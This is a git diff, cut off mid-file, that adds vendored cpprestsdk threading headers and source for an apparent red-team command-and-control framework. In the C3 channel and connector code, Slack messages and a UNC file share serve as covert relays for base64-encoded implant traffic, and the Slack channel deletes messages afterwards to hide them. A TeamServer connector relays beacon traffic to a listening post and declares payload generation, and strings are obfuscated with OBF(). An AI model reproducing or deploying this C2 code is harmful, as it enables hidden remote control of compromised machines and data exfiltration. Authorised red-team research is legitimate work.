timeout_infinite = 0xFFFFFFFF; + + _PPLXIMP event_impl(); + + _PPLXIMP ~event_impl(); + + _PPLXIMP void set(); + + _PPLXIMP void reset(); + + _PPLXIMP unsigned int wait(unsigned int timeout); + + unsigned int wait() { return wait(event_impl::timeout_infinite); } + +private: + // Windows events + void* _M_impl; + + event_impl(const event_impl&); // no copy constructor + event_impl const& operator=(const event_impl&); // no assignment operator +}; + +/// +/// Mutex - lock for mutual exclusion +/// +class critical_section_impl +{ +public: + _PPLXIMP critical_section_impl(); + + _PPLXIMP ~critical_section_impl(); + + _PPLXIMP void lock(); + + _PPLXIMP void unlock(); + +private: + typedef void* _PPLX_BUFFER; + + // Windows critical section + _PPLX_BUFFER _M_impl[8]; + + critical_section_impl(const critical_section_impl&); // no copy constructor + critical_section_impl const& operator=(const critical_section_impl&); // no assignment operator +}; + +#if _WIN32_WINNT >= _WIN32_WINNT_VISTA +/// +/// Reader writer lock +/// +class reader_writer_lock_impl +{ +public: + class scoped_lock_read + { + public: + explicit scoped_lock_read(reader_writer_lock_impl& _Reader_writer_lock) + : _M_reader_writer_lock(_Reader_writer_lock) + { + _M_reader_writer_lock.lock_read(); + } + + ~scoped_lock_read() { _M_reader_writer_lock.unlock(); } + + private: + reader_writer_lock_impl& _M_reader_writer_lock; + scoped_lock_read(const scoped_lock_read&); // no copy constructor + scoped_lock_read const& operator=(const scoped_lock_read&); // no assignment operator + }; + + _PPLXIMP reader_writer_lock_impl(); + + _PPLXIMP void lock(); + + _PPLXIMP void lock_read(); + + _PPLXIMP void unlock(); + +private: + // Windows slim reader writer lock + void* _M_impl; + + // Slim reader writer lock doesn't have a general 'unlock' method. + // We need to track how it was acquired and release accordingly. + // true - lock exclusive + // false - lock shared + bool m_locked_exclusive; +}; +#endif // _WIN32_WINNT >= _WIN32_WINNT_VISTA + +/// +/// Recursive mutex +/// +class recursive_lock_impl +{ +public: + recursive_lock_impl() : _M_owner(-1), _M_recursionCount(0) {} + + ~recursive_lock_impl() + { + _ASSERTE(_M_owner == -1); + _ASSERTE(_M_recursionCount == 0); + } + + void lock() + { + auto id = ::pplx::details::platform::GetCurrentThreadId(); + + if (_M_owner == id) + { + _M_recursionCount++; + } + else + { + _M_cs.lock(); + _M_owner = id; + _M_recursionCount = 1; + } + } + + void unlock() + { + _ASSERTE(_M_owner == ::pplx::details::platform::GetCurrentThreadId()); + _ASSERTE(_M_recursionCount >= 1); + + _M_recursionCount--; + + if (_M_recursionCount == 0) + { + _M_owner = -1; + _M_cs.unlock(); + } + } + +private: + pplx::details::critical_section_impl _M_cs; + long _M_recursionCount; + volatile long _M_owner; +}; + +class windows_scheduler : public pplx::scheduler_interface +{ +public: + _PPLXIMP virtual void schedule(TaskProc_t proc, _In_ void* param); +}; + +} // namespace details + +/// +/// A generic RAII wrapper for locks that implement the critical_section interface +/// std::lock_guard +/// +template +class scoped_lock +{ +public: + explicit scoped_lock(_Lock& _Critical_section) : _M_critical_section(_Critical_section) + { + _M_critical_section.lock(); + } + + ~scoped_lock() { _M_critical_section.unlock(); } + +private: + _Lock& _M_critical_section; + + scoped_lock(const scoped_lock&); // no copy constructor + scoped_lock const& operator=(const scoped_lock&); // no assignment operator +}; + +// The extensibility namespace contains the type definitions that are used internally +namespace extensibility +{ +typedef ::pplx::details::event_impl event_t; + +typedef ::pplx::details::critical_section_impl critical_section_t; +typedef scoped_lock scoped_critical_section_t; + +#if _WIN32_WINNT >= _WIN32_WINNT_VISTA +typedef ::pplx::details::reader_writer_lock_impl reader_writer_lock_t; +typedef scoped_lock scoped_rw_lock_t; +typedef reader_writer_lock_t::scoped_lock_read scoped_read_lock_t; +#endif // _WIN32_WINNT >= _WIN32_WINNT_VISTA + +typedef ::pplx::details::recursive_lock_impl recursive_lock_t; +typedef scoped_lock scoped_recursive_lock_t; +} // namespace extensibility + +/// +/// Default scheduler type +/// +typedef details::windows_scheduler default_scheduler_t; + +namespace details +{ +/// +/// Terminate the process due to unhandled exception +/// + +#ifndef _REPORT_PPLTASK_UNOBSERVED_EXCEPTION +#define _REPORT_PPLTASK_UNOBSERVED_EXCEPTION() \ + do \ + { \ + __debugbreak(); \ + std::terminate(); \ + } while (false) +#endif // _REPORT_PPLTASK_UNOBSERVED_EXCEPTION + +} // namespace details + +} // namespace pplx + +#endif diff --git a/Src/Common/CppRestSdk/include/pplx/threadpool.h b/Src/Common/CppRestSdk/include/pplx/threadpool.h new file mode 100644 index 0000000..d174216 --- /dev/null +++ b/Src/Common/CppRestSdk/include/pplx/threadpool.h @@ -0,0 +1,83 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * + * Simple Linux implementation of a static thread pool. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + ***/ +#pragma once + +#if defined(__clang__) +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wconversion" +#pragma clang diagnostic ignored "-Wunreachable-code" +#pragma clang diagnostic ignored "-Winfinite-recursion" +#endif +#include "boost/asio.hpp" +#if defined(__clang__) +#pragma clang diagnostic pop +#endif + +#if defined(__ANDROID__) +#include "Common/CppRestSdk/include/pplx/pplx.h" +#include +#include +#endif + +#include "Common/CppRestSdk/include/cpprest/details/cpprest_compat.h" + +namespace crossplat +{ +#if defined(__ANDROID__) +// IDEA: Break this section into a separate android/jni header +extern std::atomic JVM; +JNIEnv* get_jvm_env(); + +struct java_local_ref_deleter +{ + void operator()(jobject lref) const { crossplat::get_jvm_env()->DeleteLocalRef(lref); } +}; + +template +using java_local_ref = std::unique_ptr::type, java_local_ref_deleter>; +#endif + +class threadpool +{ +public: + _ASYNCRTIMP static threadpool& shared_instance(); + _ASYNCRTIMP static std::unique_ptr __cdecl construct(size_t num_threads); + + virtual ~threadpool() = default; + + /// + /// Initializes the cpprestsdk threadpool with a custom number of threads + /// + /// + /// This function allows an application (in their main function) to initialize the cpprestsdk + /// threadpool with a custom threadcount. Libraries should avoid calling this function to avoid + /// a diamond problem with multiple consumers attempting to customize the pool. + /// + /// Thrown if the threadpool has already been initialized + static void initialize_with_threads(size_t num_threads); + + template + CASABLANCA_DEPRECATED("Use `.service().post(task)` directly.") + void schedule(T task) + { + service().post(task); + } + + boost::asio::io_service& service() { return m_service; } + +protected: + threadpool(size_t num_threads) : m_service(static_cast(num_threads)) {} + + boost::asio::io_service m_service; +}; + +} // namespace crossplat diff --git a/Src/Common/CppRestSdk/lib/debug/x64/cpprest142_2_10.lib b/Src/Common/CppRestSdk/lib/debug/x64/cpprest142_2_10.lib new file mode 100644 index 0000000..fce9f8d Binary files /dev/null and b/Src/Common/CppRestSdk/lib/debug/x64/cpprest142_2_10.lib differ diff --git a/Src/Common/CppRestSdk/lib/debug/x86/cpprest142_2_10.lib b/Src/Common/CppRestSdk/lib/debug/x86/cpprest142_2_10.lib new file mode 100644 index 0000000..cbe0eea Binary files /dev/null and b/Src/Common/CppRestSdk/lib/debug/x86/cpprest142_2_10.lib differ diff --git a/Src/Common/CppRestSdk/lib/release/x64/cpprest142_2_10.lib b/Src/Common/CppRestSdk/lib/release/x64/cpprest142_2_10.lib new file mode 100644 index 0000000..aded630 Binary files /dev/null and b/Src/Common/CppRestSdk/lib/release/x64/cpprest142_2_10.lib differ diff --git a/Src/Common/CppRestSdk/lib/release/x86/cpprest142_2_10.lib b/Src/Common/CppRestSdk/lib/release/x86/cpprest142_2_10.lib new file mode 100644 index 0000000..4d229dc Binary files /dev/null and b/Src/Common/CppRestSdk/lib/release/x86/cpprest142_2_10.lib differ diff --git a/Src/Common/MWR/C3/Interfaces/Channels/Slack.cpp b/Src/Common/MWR/C3/Interfaces/Channels/Slack.cpp new file mode 100644 index 0000000..77e7ccd --- /dev/null +++ b/Src/Common/MWR/C3/Interfaces/Channels/Slack.cpp @@ -0,0 +1,111 @@ +#include "Stdafx.h" +#include "Slack.h" +#include "Common/MWR/Crypto/Base64.h" + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::Interfaces::Channels::Slack::Slack(ByteView arguments) + : m_inboundDirectionName{ arguments.Read() } + , m_outboundDirectionName{ arguments.Read() } +{ + auto [slackToken, channelName] = arguments.Read(); + m_slackObj = MWR::Slack{ slackToken, channelName }; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +size_t MWR::C3::Interfaces::Channels::Slack::OnSendToChannel(ByteView data) +{ + //Begin by creating a message where we can write the data to in a thread, both client and server ignore this message to prevent race conditions + std::string updateTs = m_slackObj.WriteMessage(m_outboundDirectionName + OBF(":writing")); + + //Write the full data into the thread. This makes it alot easier to read in onRecieve as slack limits messages to 40k characters. + m_slackObj.WriteReply(cppcodec::base64_rfc4648::encode(data.data(), data.size()), updateTs); + + //Update the original first message with "C2S||S2C:Done" - these messages will always be read in onRecieve. + json message; + message[OBF("direction")] = m_outboundDirectionName + OBF(":Done"); + + m_slackObj.UpdateMessage(message.dump(), updateTs); + return data.size(); +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Channels::Slack::OnReceiveFromChannel() +{ + auto messages = m_slackObj.GetMessagesByDirection(m_inboundDirectionName + OBF(":Done")); + + //Read the messages in reverse order (which is actually from the oldest to newest) + //Avoids old messages being left behind. + for (std::vector::reverse_iterator ts = messages.rbegin(); ts != messages.rend(); ++ts) + { + + std::vector replies = m_slackObj.ReadReplies(ts->c_str()); + std::vector repliesTs; + + std::string message; + + //Get all of the messages from the replies. + for (size_t i = 0u; i < replies.size(); i++) + { + message.append(replies[i][OBF("text")]); + repliesTs.push_back(replies[i][OBF("ts")]); //get all of the timestamps for later deletion + } + + //Base64 decode the entire message + auto relayMsg = cppcodec::base64_rfc4648::decode(message); + m_slackObj.DeleteMessage(ts->c_str()); //delete the message + DeleteReplies(repliesTs); //delete the replies. + return relayMsg; + } + return {}; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Interfaces::Channels::Slack::DeleteReplies(std::vector const &repliesTs) +{ + for (auto&& ts : repliesTs) + m_slackObj.DeleteMessage(ts); +} +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView MWR::C3::Interfaces::Channels::Slack::GetCapability() +{ + return R"_( +{ + "create": + { + "arguments": + [ + [ + { + "type": "string", + "name": "Input ID", + "min": 4, + "randomize": true, + "description": "Used to distinguish packets for the channel" + }, + { + "type": "string", + "name": "Output ID", + "min": 4, + "randomize": true, + "description": "Used to distinguish packets from the channel" + } + ], + { + "type": "string", + "name": "Slack token", + "min": 1, + "description": "This token is what channel needs to interact with Slack's API" + }, + { + "type": "string", + "name": "Channel name", + "min": 4, + "randomize": true, + "description": "Name of Slack's channel used by api" + } + ] + }, + "commands": [] +} +)_"; +} diff --git a/Src/Common/MWR/C3/Interfaces/Channels/Slack.h b/Src/Common/MWR/C3/Interfaces/Channels/Slack.h new file mode 100644 index 0000000..029f8a9 --- /dev/null +++ b/Src/Common/MWR/C3/Interfaces/Channels/Slack.h @@ -0,0 +1,45 @@ +#pragma once +#include "Common/MWR/Slack/SlackApi.h" + +namespace MWR::C3::Interfaces::Channels +{ + ///Implementation of the Slack Channel. + struct Slack : public Channel + { + /// Public constructor. + /// @param arguments factory arguments. + Slack(ByteView arguments); + + /// OnSend callback implementation. + /// @param packet data to send to Channel. + /// @returns size_t number of bytes successfully written. + size_t OnSendToChannel(ByteView packet) override; + + /// Reads a single C3 packet from Channel. + /// @return packet retrieved from Channel. + ByteVector OnReceiveFromChannel() override; + + /// Get channel capability. + /// @returns ByteView view of channel capability. + static ByteView GetCapability(); + + /// Values used as default for channel jitter. 30 ms if unset. Current jitter value can be changed at runtime. + /// Set long delay otherwise slack rate limit will heavily impact channel. + constexpr static std::chrono::milliseconds s_MinUpdateFrequency = 3500ms, s_MaxUpdateFrequency = 6500ms; + + protected: + /// The inbound direction name of data + std::string m_inboundDirectionName; + + /// The outbound direction name, the opposite of m_inboundDirectionName + std::string m_outboundDirectionName; + + private: + /// An object encapsulating Slack's API, providing methods allowing the consumer to send and receive messages to slack, among other things. + MWR::Slack m_slackObj; + + /// Delete all the replies to a message. + /// @param repliesTs - an array of timestamps of messages to be deleted through DeleteMessage. + void DeleteReplies(std::vector const& repliesTs); + }; +} diff --git a/Src/Common/MWR/C3/Interfaces/Channels/UncShareFile.cpp b/Src/Common/MWR/C3/Interfaces/Channels/UncShareFile.cpp new file mode 100644 index 0000000..e98e7c2 --- /dev/null +++ b/Src/Common/MWR/C3/Interfaces/Channels/UncShareFile.cpp @@ -0,0 +1,197 @@ +#include "StdAfx.h" +#include +#include +#include +#include "UncShareFile.h" +#include "Common/MWR/Crypto/Base64.h" + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::Interfaces::Channels::UncShareFile::UncShareFile(ByteView arguments) + : m_InboundDirectionName{ arguments.Read() } + , m_OutboundDirectionName{ arguments.Read() } + , m_FilesystemPath{ arguments.Read() } +{ + // If path doesn't exist, create it + if (!std::filesystem::exists(m_FilesystemPath)) + std::filesystem::create_directories(m_FilesystemPath); + + // Check if additional flag to remove all tasks was provided. + if (arguments.Read()) + { + Log({ OBF("Removing all existing file tasks."), LogMessage::Severity::Information }); + RemoveAllPackets(); + } +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +size_t MWR::C3::Interfaces::Channels::UncShareFile::OnSendToChannel(ByteView data) +{ + try + { + std::filesystem::path tmpFilePath; + std::filesystem::path filePath; + do + { + tmpFilePath = m_FilesystemPath / (m_OutboundDirectionName + std::to_string(MWR::Utils::GenerateRandomValue(10000, 99999)) + ".tmp"); + filePath = tmpFilePath; + filePath.replace_extension(); + } while (std::filesystem::exists(filePath) or std::filesystem::exists(tmpFilePath)); + + { + std::ofstream tmpFile(tmpFilePath, std::ios::trunc | std::ios::binary); + tmpFile << std::string_view{ data }; + } + std::filesystem::rename(tmpFilePath, filePath); + + Log({ OBF("OnSend() called for UncShareFile carrying ") + std::to_string(data.size()) + OBF(" bytes"), LogMessage::Severity::DebugInformation }); + return data.size(); + } + catch (std::exception& exception) + { + throw std::runtime_error(OBF_STR("Caught a std::exception when writing to a file as part of OnSend: ") + exception.what()); + return 0u; + } +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Channels::UncShareFile::OnReceiveFromChannel() +{ + // Read a single packet from the oldest file that belongs to this channel + + std::vector channelFiles; + for (auto&& directoryEntry : std::filesystem::directory_iterator(m_FilesystemPath)) + { + if (BelongToChannel(directoryEntry.path())) + channelFiles.emplace_back(directoryEntry.path()); + } + + if (channelFiles.empty()) + return {}; + + auto oldestFile = std::min_element(channelFiles.begin(), channelFiles.end(), [](auto const& a, auto const& b) -> bool { return std::filesystem::last_write_time(a) < std::filesystem::last_write_time(b); }); + + // Get the contents of the file and pass on. Return the packet even if removing the file failed. + ByteVector packet; + try + { + { + std::ifstream readFile(oldestFile->generic_string(), std::ios::binary); + packet = ByteVector{ std::istreambuf_iterator{readFile}, {} }; + } + + RemoveFile(*oldestFile); + } + catch (std::exception& exception) + { + Log({ OBF("Caught a std::exception when processing contents of filename: ") + oldestFile->generic_string() + OBF(" : ") + exception.what(), LogMessage::Severity::Error }); + } + + return packet; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Interfaces::Channels::UncShareFile::RemoveAllPackets() +{ + // Iterate through the list of file tasks, removing each of them one by one. + for (auto&& directoryEntry : std::filesystem::directory_iterator(m_FilesystemPath)) + if (BelongToChannel(directoryEntry)) + RemoveFile(directoryEntry.path()); +} +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +bool MWR::C3::Interfaces::Channels::UncShareFile::BelongToChannel(std::filesystem::path const& path) const +{ + auto filename = path.filename().string(); + if (filename.size() < m_InboundDirectionName.size()) + return false; + + if (path.extension() == ".tmp") + return false; + + auto startsWith = std::string_view{ filename }.substr(0, m_InboundDirectionName.size()); + return startsWith == m_InboundDirectionName; +} + +void MWR::C3::Interfaces::Channels::UncShareFile::RemoveFile(std::filesystem::path const& path) +{ + for (auto i = 0; i < 10; ++i) + try + { + if (std::filesystem::exists(path)) + std::filesystem::remove(path); + + break; + } + catch (std::exception& exception) + { + Log({ OBF("Caught a std::exception when deleting filename: ") + path.string() + OBF(" : ") + exception.what(), LogMessage::Severity::Error }); + std::this_thread::sleep_for(100ms); + } +} + + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Channels::UncShareFile::OnRunCommand(ByteView command) +{ + auto commandCopy = command; //each read moves ByteView. CommandCoppy is needed for default. + switch (command.Read()) + { + case 0: + RemoveAllPackets(); + return {}; + default: + return AbstractChannel::OnRunCommand(commandCopy); + } +} + + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView MWR::C3::Interfaces::Channels::UncShareFile::GetCapability() +{ + return R"( +{ + "create": + { + "arguments": + [ + [ + { + "type": "string", + "name": "Input ID", + "randomize": true, + "min": 4, + "description": "Used to distinguish packets for the channel" + }, + { + "type": "string", + "name": "Output ID", + "randomize": true, + "min": 4, + "description": "Used to distinguish packets from the channel" + } + ], + { + "type": "string", + "name": "Filesystem path", + "min": 1, + "description": "UNC or absolute path of fileshare" + }, + { + "type": "boolean", + "name": "Clear", + "defaultValue": false, + "description": "Clearing old files before starting communication may increase bandwidth" + } + ] + }, + "commands": + [ + { + "name": "Remove all message files", + "id": 0, + "description": "Clearing old files from directory may increase bandwidth", + "arguments": [] + } + ] +} +)"; +} diff --git a/Src/Common/MWR/C3/Interfaces/Channels/UncShareFile.h b/Src/Common/MWR/C3/Interfaces/Channels/UncShareFile.h new file mode 100644 index 0000000..a0f61b1 --- /dev/null +++ b/Src/Common/MWR/C3/Interfaces/Channels/UncShareFile.h @@ -0,0 +1,50 @@ +#pragma once + +namespace MWR::C3::Interfaces::Channels +{ + /// Implementation of the FileSharing via UNC paths Channel. + class UncShareFile : public Channel + { + public: + /// Public constructor. + /// @param arguments factory arguments. + UncShareFile(ByteView arguments); + + /// OnSend callback implementation. + /// @param blob data to send to Channel. + /// @returns size_t number of bytes successfully written. + size_t OnSendToChannel(ByteView blob) override; + + /// Reads a single C3 packet from Channel. + /// @return packet retrieved from Channel. + ByteVector OnReceiveFromChannel() override; + + /// Get channel capability. + /// @returns ByteView view of channel capability. + static ByteView GetCapability(); + + /// Processes internal (C3 API) Command. + /// @param command a buffer containing whole command and it's parameters. + /// @return command result. + ByteVector OnRunCommand(ByteView command) override; + + protected: + /// Removes all tasks from server. + void RemoveAllPackets(); + + /// Check if file should processed. + /// @param path to file to be checked. + /// @returns true if channel instance should handle file, false otherwise. + bool BelongToChannel(std::filesystem::path const& path) const; + + /// Removes file. + /// @param path to file to be removed. + void RemoveFile(std::filesystem::path const& path); + + /// Flow direction names. + std::string m_InboundDirectionName, m_OutboundDirectionName; + + /// Path of the directory to store the C2 messages. + std::filesystem::path m_FilesystemPath; + }; +} diff --git a/Src/Common/MWR/C3/Interfaces/Connectors/MockServer.cpp b/Src/Common/MWR/C3/Interfaces/Connectors/MockServer.cpp new file mode 100644 index 0000000..78b2c83 --- /dev/null +++ b/Src/Common/MWR/C3/Interfaces/Connectors/MockServer.cpp @@ -0,0 +1,176 @@ +#include "StdAfx.h" + +#ifdef _DEBUG + +namespace MWR::C3::Interfaces::Connectors +{ + /// Class that mocks a Connector. + class MockServer : public Connector + { + public: + /// Constructor. + /// @param arguments factory arguments. + MockServer(ByteView); + + /// OnCommandFromBinder callback implementation. + /// @param binderId Identifier of Peripheral who sends the Command. + /// @param command full Command with arguments. + void OnCommandFromBinder(ByteView binderId, ByteView command) override; + + /// Returns json with Commands. + /// @return Commands description in JSON format. + static ByteView GetCapability(); + + /// Processes internal (C3 API) Command. + /// @param command a buffer containing whole command and it's parameters. + /// @return command result. + ByteVector OnRunCommand(ByteView command) override; + + /// Called every time new implant is being created. + /// @param connectionId unused. + /// @param data unused. Prints debug information if not empty. + /// @para isX64 unused. + /// @returns ByteVector copy of data. + ByteVector PeripheralCreationCommand(ByteView connectionId, ByteView data, bool isX64) override; + + private: + /// Example of internal command of Connector. Must be described in GetCapability, and handled in OnRunCommand + /// @param arg all arguments send to method. + /// @returns ByteVector response for command. + ByteVector TestErrorCommand(ByteView arg); + + /// Represents a single connection with implant. + struct Connection + { + /// Constructor. + /// @param owner weak pointer to connector object. + /// @param id of connection. + Connection(std::weak_ptr owner, std::string_view id = ""sv); + + /// Creates the receiving thread. + /// Thread will send packet every 3 seconds. + void StartUpdatingInSeparateThread(); + + private: + /// Pointer to MockServer. + std::weak_ptr m_Owner; + + /// RouteID in binary form. + ByteVector m_Id; + }; + + /// Access blocker for m_ConnectionMap. + std::mutex m_ConnectionMapAccess; + + /// Map of all connections. + std::unordered_map> m_ConnectionMap; + }; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::Interfaces::Connectors::MockServer::MockServer(ByteView) +{ +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Interfaces::Connectors::MockServer::OnCommandFromBinder(ByteView binderId, ByteView command) +{ + std::scoped_lock lock(m_ConnectionMapAccess); + + auto it = m_ConnectionMap.find(binderId); + if (it == m_ConnectionMap.end()) + { + it = m_ConnectionMap.emplace(binderId, std::make_unique(std::static_pointer_cast(shared_from_this()), binderId)).first; + it->second->StartUpdatingInSeparateThread(); + } + + Log({ OBF("MockServer received: ") + std::string{ command.begin(), command.size() < 10 ? command.end() : command.begin() + 10 } + OBF("..."), LogMessage::Severity::DebugInformation }); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::Interfaces::Connectors::MockServer::Connection::Connection(std::weak_ptr owner, std::string_view id) + : m_Owner(owner) + , m_Id(ByteView{ id }) +{ +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Interfaces::Connectors::MockServer::Connection::StartUpdatingInSeparateThread() +{ + std::thread([&]() + { + // Lock pointers. + auto owner = m_Owner.lock(); + auto bridge = owner->GetBridge(); + while (bridge->IsAlive()) + { + // Post something to Binder and wait a little. + try + { + bridge->PostCommandToBinder(m_Id, ByteView(OBF("Beep"))); + } + catch (...) + { + } + std::this_thread::sleep_for(3s); + } + }).detach(); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Connectors::MockServer::OnRunCommand(ByteView command) +{ + auto commandCopy = command; + switch (command.Read()) + { + case 0: + return TestErrorCommand(command); + default: + return AbstractConnector::OnRunCommand(commandCopy); + } +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Connectors::MockServer::TestErrorCommand(ByteView arg) +{ + GetBridge()->SetErrorStatus(arg.Read()); + return {}; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Connectors::MockServer::PeripheralCreationCommand(ByteView connectionId, ByteView data, bool isX64) +{ + if (!data.empty()) + Log({ OBF("Non empty command for mock peripheral indicating parsing during command creation."), LogMessage::Severity::DebugInformation }); + + return data; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView MWR::C3::Interfaces::Connectors::MockServer::GetCapability() +{ + return R"( +{ + "create": + { + "arguments":[] + }, + "commands": + [ + { + "name": "Test command", + "description": "Set error on connector.", + "id": 0, + "arguments": + [ + { + "name": "Error message", + "description": "Error set on connector. Send empty to clean up error" + } + ] + } + ] +} +)"; +} +#endif // _DEBUG diff --git a/Src/Common/MWR/C3/Interfaces/Connectors/TeamServer.cpp b/Src/Common/MWR/C3/Interfaces/Connectors/TeamServer.cpp new file mode 100644 index 0000000..b1c1938 --- /dev/null +++ b/Src/Common/MWR/C3/Interfaces/Connectors/TeamServer.cpp @@ -0,0 +1,397 @@ +#include "StdAfx.h" +#include "Common/MWR/Sockets/SocketsException.h" + +namespace MWR::C3::Interfaces::Connectors +{ + /// A class representing communication with Team Server. + struct TeamServer : Connector + { + /// Public constructor. + /// @param arguments factory arguments. + TeamServer(ByteView arguments); + + /// A public destructor. + ~TeamServer(); + + /// OnCommandFromConnector callback implementation. + /// @param binderId Identifier of Peripheral who sends the Command. + /// @param command full Command with arguments. + void OnCommandFromBinder(ByteView binderId, ByteView command) override; + + /// Processes internal (C3 API) Command. + /// @param command a buffer containing whole command and it's parameters. + /// @return command result. + ByteVector OnRunCommand(ByteView command) override; + + /// Called every time new implant is being created. + /// @param connectionId adders of beacon in C3 network . + /// @param data parameters used to create implant. If payload is empty, new one will be generated. + /// @para isX64 indicates if relay staging beacon is x64. + /// @returns ByteVector correct command that will be used to stage beacon. + ByteVector PeripheralCreationCommand(ByteView connectionId, ByteView data, bool isX64) override; + + /// Return json with commands. + /// @return ByteView Commands description in JSON format. + static ByteView GetCapability(); + + private: + /// Represents a single C3 <-> Team Server connection, as well as each beacon in network. + struct Connection + { + /// Constructor. + /// @param listeningPostAddress adders of TeamServer. + /// @param listeningPostPort port of TeamServer. + /// @param owner weak pointer to TeamServer class. + /// @param id id used to address beacon. + Connection(std::string_view listeningPostAddress, uint16_t listeningPostPort, std::weak_ptr owner, std::string_view id = ""sv); + + /// Destructor. + ~Connection(); + + /// Sends data directly to Team Server. + /// @param data buffer containing blob to send. + /// @remarks throws MWR::WinSocketsException on WinSockets error. + void Send(ByteView data); + + /// Creates the receiving thread. + /// As long as connection is alive detached thread will pull available data from TeamServer. + /// @remarks to decrease traffic in network, heartbeat will not be pushed through network. + /// This class will automatically response with no-op, when TeamServer sends no-op + /// TeamServer is using heartbeat to handle chunked data. This logic will be instead performed by class handling beacon.. + void StartUpdatingInSeparateThread(); + + /// Reads data from Socket. + /// @return heartbeat read data. + ByteVector Receive(); + + /// Indicates that receiving thread was already started. + /// @returns true if receiving thread was started, false otherwise. + bool SecondThreadStarted(); + + private: + /// Pointer to TeamServer instance. + std::weak_ptr m_Owner; + + /// A socket object used in communication with the Team Server. + SOCKET m_Socket; + + /// RouteID in binary form. Address of beacon in network. + ByteVector m_Id; + + /// Indicates that receiving thread was already started. + bool m_SecondThreadStarted = false; + }; + + /// Retrieves beacon payload from Team Server. + /// @param binderId address of beacon in network. + /// @param pipename name of pipe hosted by beacon. + /// @param arch64 desired architecture of beacon. + /// @param block after block time TeamServer will send no-op packet. + /// @return generated payload. + MWR::ByteVector GeneratePayload(ByteView binderId, std::string pipename, bool arch64, uint32_t block); + + /// Close desired connection + /// @arguments arguments for command. connection Id in string form. + /// @returns ByteVector empty vector. + MWR::ByteVector CloseConnection(ByteView arguments); + + /// Initializes Sockets library. Can be called multiple times, but requires corresponding number of calls to DeinitializeSockets() to happen before closing the application. + /// @return value forwarded from WSAStartup call (zero if successful). + static int InitializeSockets(); + + /// Deinitializes Sockets library. + /// @return true if successful, otherwise WSAGetLastError might be called to retrieve specific error number. + static bool DeinitializeSockets(); + + /// Adders of TeamServer. + std::string m_ListeningPostAddress; + + /// Port of TeamServer. + uint16_t m_ListeningPostPort; + + /// Access mutex for m_ConnectionMap. + std::mutex m_ConnectionMapAccess; + + /// Access mutex for sending data to TeamServer. + std::mutex m_SendMutex; + + /// Map of all connections. + std::unordered_map> m_ConnectionMap; + }; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::Interfaces::Connectors::TeamServer::TeamServer(ByteView arguments) +{ + std::tie(m_ListeningPostAddress, m_ListeningPostPort) = arguments.Read(); + InitializeSockets(); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::Interfaces::Connectors::TeamServer::~TeamServer() +{ + DeinitializeSockets(); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Interfaces::Connectors::TeamServer::OnCommandFromBinder(ByteView binderId, ByteView command) +{ + std::scoped_lock lock(m_ConnectionMapAccess); + + auto it = m_ConnectionMap.find(binderId); + if (it == m_ConnectionMap.end()) + throw std::runtime_error{OBF("Unknown connection")}; + + if (!(it->second->SecondThreadStarted())) + it->second->StartUpdatingInSeparateThread(); + + it->second->Send(command); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +int MWR::C3::Interfaces::Connectors::TeamServer::InitializeSockets() +{ + WSADATA wsaData; + WORD wVersionRequested; + wVersionRequested = MAKEWORD(2, 2); + return 